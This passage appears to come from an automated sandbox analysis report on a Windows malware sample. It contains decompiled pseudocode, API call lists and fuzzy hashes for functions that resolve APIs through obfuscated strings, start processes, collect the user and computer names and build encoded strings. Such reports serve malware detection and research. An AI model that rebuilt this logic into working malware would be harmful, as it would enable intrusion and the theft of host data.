					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x303d2e0; // 0x22da5a8
						_t19 = _t50 + 0x303e760; // 0x5318d08
						_t20 = _t50 + 0x303e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E030334C7();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E030334C7();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x303d270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E03034AAB(_t70);
				goto L12;
			}


















                                                                                                            0x03031008
                                                                                                            0x03031008
                                                                                                            0x03031017
                                                                                                            0x0303101e
                                                                                                            0x03031023
                                                                                                            0x03031130
                                                                                                            0x03031137
                                                                                                            0x03031137
                                                                                                            0x03031032
                                                                                                            0x0303103a
                                                                                                            0x0303103d
                                                                                                            0x03031042
                                                                                                            0x03031057
                                                                                                            0x0303105d
                                                                                                            0x0303105e
                                                                                                            0x03031061
                                                                                                            0x03031067
                                                                                                            0x0303106a
                                                                                                            0x0303106f
                                                                                                            0x03031077
                                                                                                            0x03031083
                                                                                                            0x03031087
                                                                                                            0x03031117
                                                                                                            0x0303108d
                                                                                                            0x0303108d
                                                                                                            0x03031092
                                                                                                            0x03031099
                                                                                                            0x030310ad
                                                                                                            0x030310b1
                                                                                                            0x03031100
                                                                                                            0x030310b3
                                                                                                            0x030310b4
                                                                                                            0x030310bb
                                                                                                            0x030310d4
                                                                                                            0x030310d6
                                                                                                            0x030310da
                                                                                                            0x030310e1
                                                                                                            0x030310fb
                                                                                                            0x030310e3
                                                                                                            0x030310ec
                                                                                                            0x030310f1
                                                                                                            0x030310f1
                                                                                                            0x030310e1
                                                                                                            0x0303110f
                                                                                                            0x0303110f
                                                                                                            0x03031087
                                                                                                            0x0303111e
                                                                                                            0x03031127
                                                                                                            0x0303112b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                              • Part of subcall function 03034837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0303101C,?,00000001,?,?,00000000,00000000), ref: 0303485C
                                                                                                              • Part of subcall function 03034837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0303487E
                                                                                                              • Part of subcall function 03034837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 03034894
                                                                                                              • Part of subcall function 03034837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 030348AA
                                                                                                              • Part of subcall function 03034837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 030348C0
                                                                                                              • Part of subcall function 03034837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 030348D6
                                                                                                            • memset.NTDLL ref: 0303106A
                                                                                                              • Part of subcall function 03032291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,03031083,73797325), ref: 030322A2
                                                                                                              • Part of subcall function 03032291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 030322BC
                                                                                                            • GetModuleHandleA.KERNEL32(4E52454B,05318D08,73797325), ref: 030310A0
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 030310A7
                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0303110F
                                                                                                              • Part of subcall function 030334C7: GetProcAddress.KERNEL32(36776F57,03035B13), ref: 030334E2
                                                                                                            • CloseHandle.KERNEL32(00000000,00000001), ref: 030310EC
                                                                                                            • CloseHandle.KERNEL32(?), ref: 030310F1
                                                                                                            • GetLastError.KERNEL32(00000001), ref: 030310F5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                            • String ID: Uxt$@MxtNxt
                                                                                                            • API String ID: 3075724336-2342693527
                                                                                                            • Opcode ID: 71a6f915bddbf229e17b7284e243107610a33867efd1271f3ac0269edb924610
                                                                                                            • Instruction ID: b720c8c14a039d94ffd1b555cb524f82f065412b6895f82f65fdd2ed29e0ca5e
                                                                                                            • Opcode Fuzzy Hash: 71a6f915bddbf229e17b7284e243107610a33867efd1271f3ac0269edb924610
                                                                                                            • Instruction Fuzzy Hash: F2313CB6902208BFDB21EFE4CD88EDEBBBCEB49344F144565E605E7110D734A955CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03035F64, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 27%
                                                                                                            			E03035F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x303d37c; // 0x5319818
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E03033A69(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x303c1ac;
				}
				_t46 = E030351DA(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E030375F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x303d2e0; // 0x22da5a8
						_t16 = _t75 + 0x303eb10; // 0x530025
						 *0x303d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E03033A69(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x303c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E030375F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E03034AAB(_v20);
						} else {
							_t66 =  *0x303d2e0; // 0x22da5a8
							_t31 = _t66 + 0x303ec30; // 0x73006d
							 *0x303d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E03034AAB(_v12);
				}
				return _v24;
			}




























                                                                                                            0x03035f6c
                                                                                                            0x03035f72
                                                                                                            0x03035f79
                                                                                                            0x03035f7f
                                                                                                            0x03035f83
                                                                                                            0x03035f87
                                                                                                            0x03035f8a
                                                                                                            0x03035f8f
                                                                                                            0x03035f94
                                                                                                            0x03035f96
                                                                                                            0x03035f96
                                                                                                            0x03035f9f
                                                                                                            0x03035fa4
                                                                                                            0x03035fa9
                                                                                                            0x03035faf
                                                                                                            0x03035fb9
                                                                                                            0x03035fc2
                                                                                                            0x03035fc9
                                                                                                            0x03035fe2
                                                                                                            0x03035fe7
                                                                                                            0x03035fec
                                                                                                            0x03035ff5
                                                                                                            0x03035ffe
                                                                                                            0x0303600f
                                                                                                            0x03036018
                                                                                                            0x0303601c
                                                                                                            0x03036020
                                                                                                            0x03036025
                                                                                                            0x0303602a
                                                                                                            0x0303602c
                                                                                                            0x0303602c
                                                                                                            0x03036036
                                                                                                            0x0303603f
                                                                                                            0x03036046
                                                                                                            0x0303605e
                                                                                                            0x03036062
                                                                                                            0x0303609f
                                                                                                            0x03036064
                                                                                                            0x03036067
                                                                                                            0x0303606f
                                                                                                            0x03036080
                                                                                                            0x0303608c
                                                                                                            0x03036094
                                                                                                            0x03036098
                                                                                                            0x03036098
                                                                                                            0x03036062
                                                                                                            0x030360a7
                                                                                                            0x030360ac
                                                                                                            0x030360b3

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 03035F79
                                                                                                            • lstrlen.KERNEL32(?,80000002,00000005), ref: 03035FB9
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 03035FC2
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 03035FC9
                                                                                                            • lstrlenW.KERNEL32(80000002), ref: 03035FD6
                                                                                                            • lstrlen.KERNEL32(?,00000004), ref: 03036036
                                                                                                            • lstrlen.KERNEL32(?), ref: 0303603F
                                                                                                            • lstrlen.KERNEL32(?), ref: 03036046
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0303604D
                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CountFreeHeapTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 2535036572-0
                                                                                                            • Opcode ID: 64333e3bc69d4c85ffa8e2bc2f20046aed5d32a51be1e7c666729fd7fc32ba73
                                                                                                            • Instruction ID: e55ef2cf854ab95f6c1e58f89c355e938246fccb497623e7f9a09fd286bf59e4
                                                                                                            • Opcode Fuzzy Hash: 64333e3bc69d4c85ffa8e2bc2f20046aed5d32a51be1e7c666729fd7fc32ba73
                                                                                                            • Instruction Fuzzy Hash: 3E416A76902209FBCF11EFA8CC45ADEBBB9EF45344F054055EE00AB211D736DA11EB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F092FB2, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • _free.LIBCMT ref: 6F0932BF
                                                                                                            • _free.LIBCMT ref: 6F0932D8
                                                                                                            • _free.LIBCMT ref: 6F093316
                                                                                                            • _free.LIBCMT ref: 6F09331F
                                                                                                            • _free.LIBCMT ref: 6F09332B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorLast
                                                                                                            • String ID: C
                                                                                                            • API String ID: 3291180501-1037565863
                                                                                                            • Opcode ID: d928ab485b118a04e9c1d804d805c0b22d21ed92eb95f29d1e8a2c1168005cab
                                                                                                            • Instruction ID: 140a03c877b8ae2763e99a5afeb4eb023bef63c25f0ca63de64be793181158f9
                                                                                                            • Opcode Fuzzy Hash: d928ab485b118a04e9c1d804d805c0b22d21ed92eb95f29d1e8a2c1168005cab
                                                                                                            • Instruction Fuzzy Hash: DDC14A75A012199BDB24CF28C995B9DB7F8FF49304F5085AAE84DA7390E731AE90DF40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0303137A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0303137A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E030375F6(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E03034AAB(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x3034565
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                                                                            0x03031388
                                                                                                            0x0303138b
                                                                                                            0x0303138e
                                                                                                            0x03031394
                                                                                                            0x03031399
                                                                                                            0x0303139f
                                                                                                            0x030313a7
                                                                                                            0x030313aa
                                                                                                            0x030313b0
                                                                                                            0x030313b5
                                                                                                            0x030313c2
                                                                                                            0x030313cf
                                                                                                            0x030313d3
                                                                                                            0x030313d5
                                                                                                            0x030313d9
                                                                                                            0x030313dc
                                                                                                            0x030313ec
                                                                                                            0x0303143f
                                                                                                            0x03031440
                                                                                                            0x030313ee
                                                                                                            0x030313f3
                                                                                                            0x030313f4
                                                                                                            0x030313f9
                                                                                                            0x030313fc
                                                                                                            0x0303140f
                                                                                                            0x00000000
                                                                                                            0x03031411
                                                                                                            0x03031414
                                                                                                            0x03031419
                                                                                                            0x03031427
                                                                                                            0x0303142a
                                                                                                            0x03031430
                                                                                                            0x03031435
                                                                                                            0x00000000
                                                                                                            0x03031437
                                                                                                            0x03031437
                                                                                                            0x0303143a
                                                                                                            0x0303143a
                                                                                                            0x03031435
                                                                                                            0x0303140f
                                                                                                            0x03031445
                                                                                                            0x03031446
                                                                                                            0x030313b5
                                                                                                            0x0303144c

                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(00000000,03034563), ref: 0303138E
                                                                                                            • GetComputerNameW.KERNEL32(00000000,03034563), ref: 030313AA
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • GetUserNameW.ADVAPI32(00000000,03034563), ref: 030313E4
                                                                                                            • GetComputerNameW.KERNEL32(03034563,?), ref: 03031407
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,03034563,00000000,03034565,00000000,00000000,?,?,03034563), ref: 0303142A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                            • String ID: @hxt
                                                                                                            • API String ID: 3850880919-1276795746
                                                                                                            • Opcode ID: 8a3afec233eb1d9ab54cea01d45e97406e0c7662b83faafae332d195c7e16c73
                                                                                                            • Instruction ID: fa03e08e9113a7b3a23ad0587533c95450ef2bd2f033f79a17c6e4747d302749
                                                                                                            • Opcode Fuzzy Hash: 8a3afec233eb1d9ab54cea01d45e97406e0c7662b83faafae332d195c7e16c73
                                                                                                            • Instruction Fuzzy Hash: E321F976901248FFDB15EFE9C984DEEBBBDEF49200B5444AAE501E7200EB349B45DB21
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03031974, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E03031974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x303d2e0; // 0x22da5a8
				_t1 = _t9 + 0x303e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E030343A8(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E030375F6(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E03035601(_t34, _t41, _a8);
						E03034AAB(_t41);
						_t42 = E0303756E(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E03034AAB(_t36);
							_t36 = _t42;
						}
						_t43 = E030326DD(_t36, _t33);
						if(_t43 != 0) {
							E03034AAB(_t36);
							_t36 = _t43;
						}
					}
					E03034AAB(_t28);
				}
				return _t36;
			}














                                                                                                            0x03031974
                                                                                                            0x03031977
                                                                                                            0x03031978
                                                                                                            0x03031980
                                                                                                            0x03031987
                                                                                                            0x0303198e
                                                                                                            0x03031992
                                                                                                            0x03031998
                                                                                                            0x0303199f
                                                                                                            0x030319a4
                                                                                                            0x030319b6
                                                                                                            0x030319ba
                                                                                                            0x030319be
                                                                                                            0x030319c4
                                                                                                            0x030319c9
                                                                                                            0x030319d9
                                                                                                            0x030319db
                                                                                                            0x030319f2
                                                                                                            0x030319f6
                                                                                                            0x030319f9
                                                                                                            0x030319fe
                                                                                                            0x030319fe
                                                                                                            0x03031a07
                                                                                                            0x03031a0b
                                                                                                            0x03031a0e
                                                                                                            0x03031a13
                                                                                                            0x03031a13
                                                                                                            0x03031a0b
                                                                                                            0x03031a16
                                                                                                            0x03031a16
                                                                                                            0x03031a21

                                                                                                            APIs
                                                                                                              • Part of subcall function 030343A8: lstrlen.KERNEL32(00000000,00000000,00000000,770CC740,?,?,?,0303198E,253D7325,00000000,00000000,770CC740,?,?,03034653,?), ref: 0303440F
                                                                                                              • Part of subcall function 030343A8: sprintf.NTDLL ref: 03034430
                                                                                                            • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,03034653,?,053195B0), ref: 0303199F
                                                                                                            • lstrlen.KERNEL32(?,?,?,03034653,?,053195B0), ref: 030319A7
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • strcpy.NTDLL ref: 030319BE
                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 030319C9
                                                                                                              • Part of subcall function 03035601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,030319D8,00000000,?,?,?,03034653,?,053195B0), ref: 03035618
                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03034653,?,053195B0), ref: 030319E6
                                                                                                              • Part of subcall function 0303756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,030319F2,00000000,?,?,03034653,?,053195B0), ref: 03037578
                                                                                                              • Part of subcall function 0303756E: _snprintf.NTDLL ref: 030375D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                            • String ID: =
                                                                                                            • API String ID: 2864389247-1428090586
                                                                                                            • Opcode ID: d4013413b609a35b72db750eeb352dc909a2dbf99ebf710b32593d5d4aeb3f02
                                                                                                            • Instruction ID: 6902b060b34d1e69e5d5d8f9b8524763c78a7928a91b626417d950ef6705f561
                                                                                                            • Opcode Fuzzy Hash: d4013413b609a35b72db750eeb352dc909a2dbf99ebf710b32593d5d4aeb3f02
                                                                                                            • Instruction Fuzzy Hash: 4911A03B513B247B8612F7A59C84CEE67ED9ECB6A03094025FA01AF200DE38C90287A4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F065681, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065688
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065692
                                                                                                            • int.LIBCPMT ref: 6F0656A9
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0656E3
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065703
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065710
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06571D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 3920336645-0
                                                                                                            • Opcode ID: a15cc81070a22cf4bd7867f48526b46e6bc097b65eeb3781431eb724a0c1ae73
                                                                                                            • Instruction ID: 14f898f53643ffd12c7355212039c740929d5f6069663ffd3f7648b3cce13b42
                                                                                                            • Opcode Fuzzy Hash: a15cc81070a22cf4bd7867f48526b46e6bc097b65eeb3781431eb724a0c1ae73
                                                                                                            • Instruction Fuzzy Hash: 2221D275904729DBCF12DFA4CA447BEBBB2BF45728F644509E8146B3C1CBB09A11CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09D4AB, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F09D196: _free.LIBCMT ref: 6F09D1BB
                                                                                                            • _free.LIBCMT ref: 6F09D4F9
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09D504
                                                                                                            • _free.LIBCMT ref: 6F09D50F
                                                                                                            • _free.LIBCMT ref: 6F09D563
                                                                                                            • _free.LIBCMT ref: 6F09D56E
                                                                                                            • _free.LIBCMT ref: 6F09D579
                                                                                                            • _free.LIBCMT ref: 6F09D584
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                            • Instruction ID: 00fd5a655ef350daad25bf58c216a07a86bcd47fff65a1c165316015cb0849cd
                                                                                                            • Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                            • Instruction Fuzzy Hash: 6E118432582B05B6EB21AB70DC15FCB77AE5F04788F405915E2E9670D1F734B505A760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F065557, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06555E
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065568
                                                                                                            • int.LIBCPMT ref: 6F06557F
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F0655A2
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0655B9
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0655D9
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0655E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: 82a4d11eb1b3109ef3482a49506c1f3a633d6e9f55916059a67c8d14a1f3a0ec
                                                                                                            • Instruction ID: 826464c08333a62bf2303974e91dc2eb45b5aa4834feafb2aa3ec9c39f4052f0
                                                                                                            • Opcode Fuzzy Hash: 82a4d11eb1b3109ef3482a49506c1f3a633d6e9f55916059a67c8d14a1f3a0ec
                                                                                                            • Instruction Fuzzy Hash: 8F01F53A904729DBCF05DBA8CA547BD77B2BF85368F240509E4116B3C1DFB4AA52CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0654C2, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0654C9
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0654D3
                                                                                                            • int.LIBCPMT ref: 6F0654EA
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F06550D
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F065524
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065544
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065551
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            • Opcode ID: 7f5efa1ec43b459f97a789edfc51d6b2168b44ae7cd35aa9052db226b29c08a6
                                                                                                            • Instruction ID: 9f070d5edea40ddc154b5beeb207c4d746b677adeb816319792b3fca2be7afcb
                                                                                                            • Opcode Fuzzy Hash: 7f5efa1ec43b459f97a789edfc51d6b2168b44ae7cd35aa9052db226b29c08a6
